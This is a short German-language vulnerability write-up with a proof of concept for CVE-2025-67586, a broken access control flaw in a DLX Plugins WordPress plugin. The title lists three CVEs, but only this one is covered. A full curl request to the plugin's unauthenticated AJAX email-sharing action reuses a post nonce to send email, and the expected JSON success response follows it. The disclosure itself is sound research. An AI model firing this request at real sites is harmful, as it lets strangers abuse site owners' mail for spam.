
Write-ups für (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)
Writeups für (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)
-------------- CVE-2025-67586 Exploit PoC --------------
==> Beschreibung Eine Schwachstelle durch fehlerhafte Zugriffskontrolle (Broken Access Control) besteht in einem WordPress-Plugin von DLX Plugins. Das Plugin stellt eine nicht authentifizierte AJAX-Aktion bereit, die es Angreifern ermöglicht, die "Share via Email"-Funktionalität ohne ordnungsgemäße Berechtigungsprüfungen zu missbrauchen.
Ein nicht authentifizierter Angreifer kann ein gültiges Post-Nonce wiederverwenden, um E-Mail-Sharing-Anfragen auszulösen, was zu unbefugtem E-Mail-Versand (E-Mail-Spam / Missbrauch) ohne Benutzerauthentifizierung führt.
==> Erforderliche Berechtigungen Keine (nicht authentifiziert)
==> Proof of Concept (PoC)
Schritt 1: Website mit installiertem Plugin auswählen
Schritt 2: Ein gültiges Nonce erhalten
Schritt 3: Exploit über nicht authentifizierte Anfrage
bash-Befehl: (Website-URL, Post-URL und Nonce ersetzen)
curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php'
-d 'action=has_email_form_submission'
-d 'formData[postId]='
-d 'formData[permalink]=http://localhost/?p='
-d 'formData[nonce]='
-d 'formData[toEmail]=[email protected]'
-d 'formData[subject]=PoC'
-d 'formData[shareText]=POC test'
-d 'formData[emailShareType]=selection'
--compressed
--> Erwartete JSON-Antwort:
{ "success": true, "data": { "errors": false, "message_title": "This post has been shared!", "message_body": "You have shared this post with [email protected]", "message_subject": "[Shared Post] ", "message_source_name": "Site Name", "message_source_email": "[email protected]" } }